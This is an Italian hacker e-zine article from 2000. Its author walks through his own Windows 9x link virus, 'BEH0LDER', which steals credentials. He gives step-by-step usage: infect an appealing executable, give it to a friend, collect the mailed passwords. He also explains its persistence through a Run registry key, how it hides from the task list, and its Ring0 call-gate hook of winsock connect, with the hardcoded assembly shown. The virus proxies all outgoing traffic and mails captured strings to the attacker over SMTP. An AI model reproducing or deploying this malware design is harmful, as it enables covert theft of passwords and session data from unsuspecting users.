Copy Link
Add to Bookmark
Report

BFi numero 08 anno 3 file 21 di 28

eZine's profile picture
Published in 
Butchered From Inside
 · 5 years ago

  

==============================================================================
------------[ BFi numero 8, anno 3 - 30/04/2000 - file 21 di 28 ]-------------
==============================================================================


-[ ViRii ]--------------------------------------------------------------------
---[ BEH0LDER 1.03
-----[ NaGA <tarrasque@freemail.it>

________________________
/
BEHOLDER 1.03
__________________________/

Autore : NaGA
Cosa fa : Wide Net Sniffer per session passwords in Windows 9x
Cosa non fa : Non puo' essere usato come patch per Quake
Software : Masm32, Visual C++ 5, SoftIce, copy del DOS


-INTRO
La vita del programmatore e' abbastanza monotona: sempre il solito SQL, il
solito VisualBasic, le solite tabelle...

-L'INIZIO
Quando a 10 anni comprai il mio primo computer dissi a mia madre che l'avrei
usato per studiare. Poi nella mia vita arrivo il CIH che, oltre ad arrecare
danni fisici al mio comp per un totale di 500K lire, penso' bene di troncare
ogni mia velleita' artistica cancellando TUTTI i sorgenti contenuti nel mio
harddisk.
Da quel giorno smisi di prendere per il culo RancoR per il fatto che faceva
un backup al mese.
Da quel giorno decisi che era venuto il momento di passare al lato oscuro
(e di cominciare a fare i backup).

L'idea del beholder mi venne in mente dopo aver visto i sorgenti del CIH
(con relativo Tut di non mi ricordo chi) e il codice del NetRaider scritto
da \sPIRIT\.
All'inizio era un idea confusa, poi tutto divenne piu' chiaro...

-LE FORMALITA'
Come al solito non mi assumo nessuna responsabilita' per l'uso che voi farete
del programma. Se vi si fonde il computer, se l'FBI arriva a casa vostra,
se la vostra ragazza vi lascia perche' vi masturbate davanti a codice asm,
io non ne ho nessuna colpa (anzi mi provocherebbe un sadico piacere :) ).

-COME FUNZIONA
Cominciamo col dire che non so con certezza se il prog funziona o no.
Come ogni tesi scientifica puo' essere smentita, ma mai dimostrata con
certezza, cosi' anche questo programma e' stato testato con successo.
Ma dire che il prog funziona sempre e comunque e' tutto un altro paio di
maniche.
NON SONO PARENTE DI BILL GATES QUINDI NON SO SE MAMMA MICROSOFT HA CAGATO
DELLE VERSIONI DI WINSOCK DIVERSE CON CUI IL CODICE NON FUNZIONA.
Cambiamo allora il titolo del paragrafo...

-COME DOVREBBE FUNZIONARE
In breve il beholder e' un link virus. Quando si manda in esecuzione il prog
a cui e' attaccato, il beholder si installa nella directory di windows sotto
falso nome, maschera la sua presenza, inserisce una chiave nel registro in
modo da essere lanciato ad ogni avvio, scende a Ring0 e fa un hook delle
winsock.
Quando un nuovo processo fa una 'connect', il beholder reindirizza la socket
su se stesso e poi apre una sua socket col vero destinatario.
In questo modo ogni successiva 'send' del processo sfortunato arrivera' al
beholder. Il beholder spedisce il pacchetto anche al destinatario reale, poi
ne esamina il contenuto. Se si tratta di una stringa (una potenziale password)
la maila ad un nostro account nella forma:

-> XX-YY-ZZ-TT-HH-LL-dati

dove:

XX, YY, ZZ, TT: sono i quattro campi dell'indirizzo di destinazione,
in notazione puntata, scritti in esadecimale;
HH e LL : sono la parte alta e la parte bassa della word contente
la porta di destinazione (sempre in esadecimale);
dati : e' la stringa spedita.

Ad esempio una stringa 'ciao' spedita a 127.0.0.1 sulla porta 25
comparira' nella forma:
7F-00-00-01-00-19-ciao
Questo e' tutto.

-COME SI USA
Trovate un prog che possa interessare a qualcuno.
Lanciate il vostro bel programmino Bh.exe .
Riempite i campi con
1) Il nome del file che volete infettare, cioe' il prog interessante
(deve essere un PE)
2) Il nome che avra' il file una volta infettato
3) Un vostro account di posta elettronica
4) L'indirizzo (numerico o simbolico) del vostro mailer preferito
NB: se non avete un mailer che fa Relaying da ogni mittente usate il mailer relativo
al vostro indirizzo di posta elettronica, che è molto meglio...
Schiacciate il tasto Ok.
Passate il file infettato ad un vostro amico o uploadatelo da qualche parte.
Controllate periodicamente il vostro account di posta elettronica.
Divertitevi.

-PARLIAMO DI CODICE (Ring0 e HardCode)
La parte di codice relativa all'interfaccia utente, al linking del codice
virale e alla creazione del dropper e' scritta interamente in Visual C++.
Come funziona un dropper probabilmente lo saprete gia'. Se non lo sapete,
sicuramente troverete qualcuno capace di spiegarvelo meglio di me, quindi
non indugiamo oltre su questo argomento.

Vi basti sapere che una volta lanciato il file infettato, questo creera', dal
codice virale (decriptandolo con chiave random e decomprimendolo),
un nuovo file chiamato check_dll32.exe nella directory di
windows e lo lancera'. Questo nuovo processo e' il nostro beholder.
N.B.: L'eseguibile bh.exe ha provveduto ad inserire (al momento
dell'infezione) nella parte dati del programma check_dll32.exe, l'account di
posta ed il nome del mailer al posto dei tag '884CACCA' e '885CACCA' (cioe'
le vars stealthEMail e Mailer).

Per capire meglio di cosa parlero', vi consiglio di leggere il tutorial
insieme al codice allegato (che non riportero' qui data la sua lunghezza).

Per prima cosa il programma verifica quale versione delle Winsock si sta
usando (1 o 2) con GetModuleHandle e GetProcAddress.
Infatti la Microsoft, per le WS2, ha creato dei bei wrapper delle funzioni
originali, ma gli ha mappati in delle zone di memoria diverse.
Sapendo quindi l'indirizzo di 'connect' potremo risalire alla versione in
uso (e' molto piu' sbrigativo e sicuro che parsare la stringa della ver.).
C'e' pero' un piccolo problema. Per le WS2 esistono un sacco di versioni
diverse di WSock32.dll . Il loro codice e' pressocche' identico, ma vengono
allocate in zone di memoria diverse. Per mantenere la compatibilita'
l'Hardcode viene rilocato in base all'indirizzo di inizio di connect (in
pratica vengono cambiati tutti i salti nell'Hardcode).

Come avrete notato, nel codice ci sono delle parti Hardcodate.
Il secondo passo sara' quindi andare a modificare nell'hardcode i numeri di
porta in relazione al layer di comunicazione (little endian o big endian).
Per gli indirizzi non c'e' bisogno poiche' si svolge tutto in locale.
Tutto questo e' fatto con la funzione htons.

Ora si tratta di scendere a Ring0. Crea quindi un CallGate utilizzando il
segmento 0x28 con i diritti di ringzero e con l'indirizzo della nostra
procedura Ring0Proc. Poi inserisce il nostro CallGate nella
LocalDescriptorTable al primo posto e lo richiama (per ulteriori chiarimenti
guardatevi il codice o il relativo Tut nell'Asj1; lo trovate fra i tut di
Ringzer0).
Ora siamo nella procedura Ring0Proc e SIAMO a ring0!!!

Ring0Proc copia il contenuto dell'hardcode nello spazio di indirizzamento
delle API di windows. Dato che Windows si crede furbo e non ricarica i moduli
gia' in memoria, tutti i processi che sono gia' stati lanciati e tutti quelli
che verranno lanciati in seguito utilizzeranno la nostra versione 'ritoccata'
delle winsock. Questo finche' rimarra' almeno un processo che utilizza le
winsock. Infatti, quando tutti i processi che le utilizzano vengono chiusi,
le winsock (come tutti gli altri moduli) vengono scaricate dalla memoria, per
poi essere ricaricate da disco quando qualcun altro ne richiedera' l'utilizzo.
Non vi preoccupate, comunque, il nostro beholder continuera' a girare fino
allo spegnimento della macchina!!!
Per eseguire le parti di codice aggiunto, i primi e gli ultimi 5 byte di
connect vengono riscritti con dei salti al codice.

N.B.: Per le winsock1 il codice viene aggiunto in coda al modulo stesso, per
le WS2 viene aggiunto alla fine di WS2_32 (perche' in coda a WSock32 non
c'e' abbastanza spazio)

N.B.: Le destinazioni di tutti i salti sono ovviamente cannate. Per poter
vedere esattamente il codice vi consiglio di usare SoftIce.
Lanciate il beholder e poi fate un bel
'u connect' e 'u 78A6A6D1h' per le WS2 o 'u 7c3ec130h' per WS1
(che sono gli indirizzi dove il codice si piazza).

Vediamo ora cosa contiene l'HardCode...

-Hard code per WinSock1

; Poiche' per inserire dei salti cancelliamo 5 byte di connect
; li ricopiamo all'inizio della nostra procedura
83EC1C sub esp,01C
56 push esi
57 push edi

; Il beholder deve poter utilizzare la versione originale di connect.
; Per farlo mette la signature 883CACCA in ebx
; Se la signature viene rilevata salta tutto il codice aggiunto
81FBCAAC3C88 cmp ebx,0883CACCA
0F84C456FFFF je 0FFFF6AE3

; Legge dallo stack i parametri di connect che ci interessano
; struttura sockaddr in eax e socket handle in edi
8B44242C mov eax,[esp][0002C]
8B7C2428 mov edi,[esp][00028]

; Si crea uno stack locale in modo da poter conservare i suoi
; dati fino alla fine della procedura
81EC14020000 sub esp,000000214

; Ricava dalla struttura sockaddr passata a connect
; l'indirizzo di destinazione in edx e la porta in cx
8B5004 mov edx,[eax][00004]
668B4802 mov cx,[eax][00002]
52 push edx
6651 push cx

; Redireziona sul beholder la connessione
B97F000001 mov ecx,00100007F
BA06660000 mov edx,000006606 ; Questo viene
; cambiato da htons
; (pusha signature del pacchetto di inizio connessione)
52 push edx
90 nop
894804 mov [eax][00004],ecx
66895002 mov [eax][00002],dx
33D2 xor edx,edx

; Infiliamo nello stack gli altri parametri utili per la send di
; inizio connessione (ne parleremo dopo)
; flags
52 push edx
BA0A000000 mov edx,00000000A
52 push edx
; dati
8D542408 lea edx,[esp][00008]
52 push edx
; handle della socket
57 push edi

; Ripristina lo stack e ritorna a connect
81C42E020000 add esp,00000022E
E97F56FFFF jmp 0FFFF6AE3

; Qui siamo gia' alla fine di connect
; verifica la signature
81FBCAAC3C88 cmp ebx,0883CACCA
7411 je .00040307D

; ritorna allo stack del beholder
81EC2E020000 sub esp,00000022E

; chiama 'send' per inviare il pacchetto di inizio connessione
E83DE0FFFF call .0004010B4
81C41E020000 add esp,00000021E

; Ricopia gli utlimi 5 byte di connect cancellati dal salto per l'hook
5F pop edi
5E pop esi
83C41C add esp,01C

; Azzera il valore di ritorno ed esce
33C0 xor eax,eax
90 nop
90 nop
C20C00 retn 0000C

E92BA90000 ; questi sono i jmp che sono messi all'inizio
E999A80000 ; e alla fine di connect per l'hook

-Hard code per WinSock2

; Tralascio i commenti poiche' e' MOLTO simile al precedente
81FBCAAC3C88 cmp ebx,0883CACCA
7448 je .0004030E7
8B442408 mov eax,[esp][00008]
8B4C2404 mov ecx,[esp][00004]
81EC14080000 sub esp,000000814
57 push edi
8BF9 mov edi,ecx
90 nop
8B5004 mov edx,[eax][00004]
668B4802 mov cx,[eax][00002]
52 push edx
6651 push cx
B97F000001 mov ecx,00100007F
BA06660000 mov edx,000006606
52 push edx
90 nop
894804 mov [eax][00004],ecx
66895002 mov [eax][00002],dx
33D2 xor edx,edx
52 push edx
BA0A000000 mov edx,00000000A
52 push edx
8D542408 lea edx,[esp][00008]
52 push edx
57 push edi
8B7C241A mov edi,[esp][0001A]
81C432080000 add esp,000000832
A1A861007A mov eax,[07A0061A8]
E93C6D5901 jmp 00159822D
90 nop
90 nop
90 nop
3DFFFFFFFF cmp eax,0FFFFFFFF
7420 je .00040311B
90 nop
FFD0 call eax
81FBCAAC3C88 cmp ebx,0883CACCA
90 nop
90 nop
7413 je .00040311B
81EC32080000 sub esp,000000832
E8EB6F5901 call 0015984FE
33C0 xor eax,eax
81C422080000 add esp,000000822
C20C00 retn 0000C

E96A92A6FE jmp 0FEA6A78D
E99392A6FE jmp 0FEA6A7BB

N.B.: I nop ci sono per future espansioni del codice (e perche' non mi andava
di ricalcolarmi gli offset per i salti).

A questo punto credo che abbiate un gran mal di testa, quindi cerchero'
di tradurre il tutto in qualcosa di comprensibile...

La 'connect' truccata in realta' non fa altro che saltare al nostro codice
aggiunto dove vengono cambiati i parametri della funzione (struct sockaddr)
inserendo indirizzo e porta del beholder. Poi prepara nello stack i parametri
da passare alla send che viene effettuata alla fine di 'connect' (tramite un
altro salto al nostro codice).
Questa send serve per mandare al beholder un pacchetto di inizio connessione
targato 666 (viva l'originalita') in cui ci sono porta e indirizzo del
destinatario reale. In questo modo quando il beholder riceve una conessione
riceve anche fin da subito un pacchetto in cui c'e' il reale destinatario.
E tutto questo e' fatto dalla connect stessa!!!

Il beholder pero' doveva poter utilizzare la versione non ritoccata della
connect... semplice, basta inserire 0x883CACCA in ebx e la connect salta
il codice aggiunto.

Mi sono accorto che questo paragrafo sta diventando troppo lungo quindi...

-TORNIAMO SULLA TERRA (Camuffamento)
Ora abbiamo hookato l'API connect e tutto il traffico in uscita arrivera'
al nostro beholder. Adesso si tratta di far sparire il nostro processo.
Questa parte e' pesantemente ispirata a NetRaider, quindi thanx \sPIRIT\ :)

Utilizziamo innanzitutto l'API (mal) documentata RegisterServiceProcess che,
se non usata sotto NT, fa sparire il nostro processo dalla lista dei task
che si ottiene con CTRL+ALT+CANC. Per richiamarla dovremo di nuovo usare
GetModuleHandle (di kernel32) e GetProcAddress.
A questo punto dobbiamo inserire una chiave nel registro in
'Software\Microsoft\Windows\CurrentVersion\Run' per far lanciare il beholder
ad ogni avvio. Chiamiamo questa key 'SystemCheck'.
Se la chiave non esiste vuol dire che e' la prima volta che eseguiamo il
programma, quindi dovremo fare un paio di cose in piu'.
Utilizziamo la funzione GetWindowsDirectory per completare i path dei
file che si trovano nella directory di Windows.
Adesso apriamo il file notepad, ne leggiamo la data e settiamo con questa
la data del file chek_dll32.exe che, a questo punto, avra' un aspetto piu'
da file 'di sistema'. Dopo aver fatto questo richiudiamo i due file
e creiamo effettivamente la chiave SystemCheck con, ovviamente, il valore
"PATH\check_dll32.exe".
Se invece la chiave esisteva gia', tutta questa parte di codice viene saltata.
E' arrivato il momento di...


-LA PARTE PIU' INUTILE (Main)
Dopo aver aperto una finestra (rigorosamente invisibile) indispensabile per
la gestione dei messaggi, inizializiamo l'uso delle Winsock con WSASturtup.
Creiamo adesso una socket 'principale' che mettiamo in ascolto sulla porta
0x666 (sempre piu' originale) tramite le solite bind e listen.
Prima pero' settiamo la socket in modalita' asincrona in modo tale che ci
ritorni un messaggio WM_LISTSOCKET ad ogni tentativo di connessione.
Dopo aver fatto questo dobbiamo fare una piccola modifica all'account e-mail
che il dropper ha provveduto a scrivere al posto del tag '884CACCA'.
Aggiungiamo l'"a capo" alla fine della stealthEMail.
Poi c'e' il ciclo di ricezione messaggi.
Troppo facile? Avremo subito il modo di rifarci con...


-EHI, CE L'HAI CON ME AMICO? (Gestione messaggi)
Leggiamo innanzitutto il codice del messaggio. Se e' WM_LISTSOCKET vuol
dire che viene dalla socket 'primaria' in ascolto sulla porta 666, quindi
si tratta di una nuova connessione. Il controllo che si tratti di un messaggio
di tipo FD_ACCEPT e' una pura formalita' (o quasi).
A questo punto e' doveroso parlare di questa fantomatica tabella delle
connessioni (ConnBuff). Questa tabella serve per sapere dove dobbiamo buttare
fuori quello che ci arriva dalle socket in entrata
La tabella e' cosi' formata:
____________________________
| hsl1 | hsr1 | add1 | port1 | Ogni entry e' di 16byte, 4 per elemento
| hsl2 | hsr2 | add2 | port2 | (la porta in realta' ne occupa solo 2,
| ecc. | ecc. | ecc. | ecc. | seguiti da 2 zeri)
----------------------------
Ogni entry rappresenta una connessione dove hsl1 e' l'handle della socket
relativa alla parte locale della connessione, hsr1 e' l'handle della socket
relativo alla parte in remoto della connessione e add1 e port1 sono indirizzo
e porta dell'host remoto.
Ad esempio, se ci arriva qualcosa su hsl1 noi dobbiamo spedirla su hsr1 e
viceversa.
Se il primo campo di una entry e' 0 vuol dire che la entry e' libera.
Cerchiamo quindi una entry libera nella tabella. Avremo in esi il suo
puntatore.
Una volta fatta l'accept riempiamo il primo campo della tabella con l'handle
che ci ritorna. Vedremo come riempire gli altri campi in seguito.
All'interno del ciclo pero' avevamo incrementato anche ebx a partire da
WM_LISTSOCKET in poi, di 2 in 2.
A cosa sara' servito mai? Semplice. Adesso dobbiamo mettere la socket appena
creata in modalita' asincrona e le faremo ritornare un numero di messaggio
via via crescente, in maniera da sapere sempre da dove ci arrivano i dati.
Mi spiego meglio: ogni volta che verra' fatta una scrittura o una chisura
su queste socket ci verra' segnalata con un messaggio; un messaggio
WM_LISTSOCKET+1 vuol dire che e' la notifica di un evento proveniente
da hsl1, WM_LISTSOCKET+2 da hsr1, WM_LISTOCKET+3 da hsl2 e cosi' via.
Ma torniamo a noi.

Se invece di WM_LISTSOCKET il messaggio ricevuto e' nel range
WM_LISTSOCKET+1 - WM_LISTSOCKET+200, vuol dire che ci arriva da una socket
'secondaria' (una di quelle della tabella). Dal numero di messaggio possiamo
risalire alla coppia di socket (locale-remota) in qustione semplicemente
sottraendo WM_LISTSOCKET+1 e shiftando tutto a destra di un bit.
Altrettanto semplicemente possiamo sapere se si tratta di dati in entrata o in
uscita esaminando l'ultimo bit del messaggio (il codice mi sembra gia' chiaro
di per se'). A questo punto se il messaggio e' di tipo FD_READ (dati in
arrivo) il compito di gestirlo e' lasciato alla funzione Incoming a cui
passiamo il numero di entry nella tabella delle connessioni e un flag che
indica se i dati arrivano dalla parte locale della connessione (hsl) o dalla
parte remota (hsr). Se invece il messaggio e' di tipo FD_CLOSE (qualcuno ha
chiuso la connessione) usiamo ClosePair per chiudere sia hsl che hsr relativi
e azzerare le corrispondenti entries della tabella.
Inoltre ogni volta che c'e' un messaggio FD_CLOSE viene invocata la funzione
EndMail. Questa funzione verifica che la connessione col mailer fosse stata
instaurata e che gli fosse gia' stato spedito qualcosa (cMail). In caso
affermativo manda il carattere di fine mail '.' al mailer e chiude la
connessione. Ovviamente, subito dopo, la connessione viene riaperta
con GoMail e viene iniziato il protocollo per una nuova mail. Questo perche'
il mailer non accetta la mail se non termina con il punto. Qualche 'punto'
bisognava pur mandarlo ogni tanto, non potevamo rischiare che la macchina
venisse spenta prima di aver concluso almeno una mail.
Il beholder spedisce punti ad ogni FD_CLOSE.
Ma passiamo subito a...

-IO L'HO AVUTO GRATIS CON LA VOODOO2 (Incoming)
Innanzitutto estraiamo da ConBuff (la tabella delle connessioni) l'handle
della socket da cui ci arrivano i dati (spero non vi spaventerete a
interpretare un paio di shift!). Poi usiamo ioctlsocket per avere in
'availableData' il numero di bytes pendenti sulla socket.
Adesso allochiamo un bel buffer della dimensione giusta e lo lockiamo.
A questo punto c'e' un problemino.
Vi ricordate del pacchetto di inizio connessione? Bene, e' probabile
che un'aplicazione come IExplorer subito dopo aver fatto 'connect'
(ed aver mandato quindi il pacchetto di inizio) mandi anche qualche altra
cosa. Quindi adesso possiamo avere sulla socket piu' di un pacchetto accodato.
Questo problema sorge solo col pacchetto di inizio connessione, poiche'
per gli altri dati non e' indispensabile mantenere i confini di messaggio e
possiamo leggere e spedire tutto in una botta. Per risolvere il problema
utilizziamo fuffOffsetBuffer per muoverci all'interno del buffer allocato.
Verifichiamo innanzitutto se i dati arrivano da locale o da remoto.

(da locale)
Confrontiamo ora i primi byte del pacchetto con il clientID (666) per vedere
se si tratta del pacchetto di inizio connessione. Se e' il primo, leggiamo
la porta e l'indirizzo di destinazione (originali) e riempiamo i campi
mancanti della tabella delle connessioni (hsr, add, port).
Dopodicche' apriamo una socket verso il destinatario originale.
A questo punto la catena e' chiusa!!!. Ogni dato che ci arrivera' potra'
essere smistato nella giusta direzione in maniera trasparente
all'applicazione. Per fare 'connect' dobbiamo inserire in ebx la signature
'0x883CACCA' per aggirare il codice aggiunto all'API. Per vedere se
si e' verificato un errore (ad esempio l'host non esiste) utiliziamo
WSASetLastError e WSAGetLastError.
Nelle due versioni di 'connect' i valori di ritorno sono diversi (W la
documentazione Microsoft!); per avere uniformita', l'API ritoccata azzera
il valore di ritorno. Avremo quindi bisogno di GetLastError per vedere se la
connessione e' andata a buon fine (forse e' la mia versione bacata di 95, ma
la funzione ritorna dei valori pseudocasuali).
Gli altri processi che chiameranno la connect truccata riceveranno cosi'
sempre 0, in conformita' alle specifiche in caso di connessione avvenuta,
poiche' la loro connect avra' sempre successo (infatti, in realta' si
connettono in locale).
Se si e' verificato un errore chiudiamo la socket in entrata, azzeriamo
la tabella e ritorniamo.
A questo punto settiamo la socket in modalita' asincrona e le assegnamo
un numero di messaggio proprio come abbiamo fatto prima per la socket
in entrata.
Ora dobbiamo verificare se in coda al pacchetto di inizio connessione c'e'
qualcos'altro. Per farlo sottriamo al valore availableData la dimensione
del pacchetto di inizio. Se il risultato e' maggiore di 0 dobbiamo continuare
a leggere. La parte di codice seguente viene eseguita anche se il pacchetto
che ci e' arrivato non e' quello di inizio connessione (anche in questo
caso, infatti, availableData avra' un valore maggiore di 0).
Estraiamo dalla tabella l'handle della socket su cui li dobbiamo sbattere
fuori (sara' quello immediatamente successivo all'handle di ingresso).
Dopo averli sbattuti fuori controlliamo se si e' verificato un errore.
In caso affermativo resettiamo entrambe le connessioni.
A questo punto controlliamo il contenuto del pacchetto con la funzione
PacketTest. Questa funzione richiama StrLen che calcola quanti caratteri di
testo ci sono nel pacchetto. Se questo numero corrisponde alla lunghezza
del messaggio (a meno di 1 per le stringhe NULL-terminated) vuol dire
che dalle nostre porte e' uscita una stringa. In questo caso ripristiniamo
la connessione col mailer (se questa non c'e') e spediamo il messaggio.
Questo viene fatto per mezzo della funzione GoMail che tenta di stabilire
una connessione col mailer (dopo averne risolto il nome) e di iniziare
il protocollo.
Un breve ripasso di SMTP:
1) helo 'nome server'
2) mail from: 'dummy'
2) rcpt to: 'destinatario'
3) data
...Dati...
4) . <-- Per la chiusura
Per verificare se la connessione e' stata stabilita o meno viene settata
la variabile isMailer. Ogni volta che vorremo mailare qualcosa, se questa
variabile e' a NULL, dovremo richiamare GoMail.
Prima del testo viene spedita una stringa contenente l'indirizzo e la porta
a cui erano destinati i dati in origine. Questa stringa ha il formato che ho
descritto nell'introduzione (COME DOVREBBE FUNZIONARE). I campi della stringa
(indirizzo-porta) sono contenuti nella tabella delle connessioni, nella entry
relativa alla coppia di socket in questione. La conversione in ASCII viene
effettuata dalla funzione HexConv.

(da remoto)
Estraiamo dalla tabella la socket su cui dobbiamo sbattere i dati.
Questa volta si trattera' di una socket locale, quindi, se siete stati
attenti, avrete gia' intuito che il suo handle si trova esattamente
prima di quello da cui ci sono arrivati i dati.

Una volta smistati i dati deallochiamo il buffer.
Bene, abbiamo finito, manca solo...


-IL DUBBIO AMLETICO
A questo punto vi chiederete dove ho usato il copy del DOS.
Semplice, il codice virale assemblato e' stato accodato al codice del
'dropper-maker' con una bella 'copy /B Bh.exe + beholder.exe Bh.exe'
dove 'Bh' era il dropper-maker e 'beholder' il nostro assemblato.
Poi ci pensa lui (al momento del linking) a comprimerlo e a criptarlo
a chiave random.

-UNO SGUARDO AL FUTURO (Possibili sviluppi)
Beh (older, ah, ah, sono proprio simpatico), cominciamo col dire che ci
sarebbe bisogno di un programmino per parsare le mail e dividere il traffico
a seconda della destinazione, in modo da avere un output piu' leggibile.
Il codice virale e' compresso e criptato a chiave random (per ora e' poco piu'
di un xor), ma il tutto puo' essere migliorato.
Il prog potrebbe anche contenere una lista di nomi di file e di chiavi per
potersi installare in maniera casuale.
Potrebbe anche cambiare ad ogni installazione la porta su cui si mette in
ascolto. Insomma il camuffamento potrebbe essere migliorato.
Poi, per potersi fregiare del titolo di linkvirus, il beholder dovrebbe
potersi duplicare anche su altri file, magari intercettando le sessioni FTP
e linkandosi ai file in uscita (magari anche dentro agli zip); non sarebbe,
infatti, un granche' utile se si linkasse a file che non usciranno mai dal
comp dello sfortunato (ah, ti passo un nuovo editor potentissimo, si chiama
Notepad).
Si potrebbe cambiare PacketTest per intercettare anche altri tipi di dato
(cookies, query, ecc.).
Si potrebbero inserire una serie di indirizzi di siti porno da inserire
casualmente al posto dei parametri di connect (immaginate il vostro amico
che si connette felice al sito della Microsoft e si ritrova invece in
www.pompini.com)
Potrebbe addirittura essere trasformato in un cripter trasparente alle
applicazioni.
Insomma e' molto versatile, anche troppo (infatti sotto NT non funziona).


-OUTRO
Scrivere questo tutorial e' stato molto meno divertente che scrivere il
codice, ma almeno questo non l'ho dovuto debuggare.
Non so quanto abbiate capito di quello che ho scritto (so che a volte ho
delle espressioni un po' involute), ma spero di avervi dato almeno un'idea
di come funziona il programma. D'altra parte alcuni argomenti erano abbastanza
lunghi e complessi da spiegare. Cmq se volete maggiori chiarimenti scrivete
pure a 'tarrasque@freemail.it' o postate
sul Forum di ringzer0 (http://ringzer0.cjb.net) con il topic 'beholder': saro'
lieto di rispondere a qualsiasi domanda (che non riguardi la mia vita
privata).
Ah, dimenticavo, NON utilizzate il vostro solito account di posta per il
Beholder perche':
A) Non si sa mai che qualcuno possa risalire a voi
B) Potrebbe arrivarvi TANTA merda

-I SALUTI
Ringrazio innanzitutto gli autori dei codici e dei tut a cui mi sono ispirato.
Ringrazio in particolar modo il mio fido compagno di sventura RancoR, senza
il quale probabilmente l'unica funzionalita' del beholder sarebbe stata
quella di far crashare windows.
Un grazie di cuore all'inventore delle bevande alcoliche.
Saluto inoltre la crew di Ringzer0,|LnZ|,Paolo 'ometto tutto speciale',
AloR (stiamo preparando un progetto per l'uni che fa paura), Pesy (la persona
senza la quale questo progetto non avrebbe mai funzionato: la CAVIA), Cianni,
Linda, Miki, la Bestia, Rudi, Gupy, Giamma, Maphas, Dk2DEnd, 10t80r (questo
tut te lo mando in multicast), Teo, i demo coders della scena italiana,
Ghisha 'ehm, no, non si puo' intercettare traffico in uscita...',
e tutti quelli che mi sono dimenticato.
Non ringrazio il creatore del CIH.

-LA MASSIMA
Spesso guardi la pagliuzza che e' nell'occhio dell'amico e non ti accorgi
della trave che hai su per il culo (anche se e' una settimana che non caghi
e sederti ti provoca uno strano piacere).

*NaGA*


==============================================================================
--------------------------------[ EOF 21/28 ]---------------------------------
==============================================================================

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT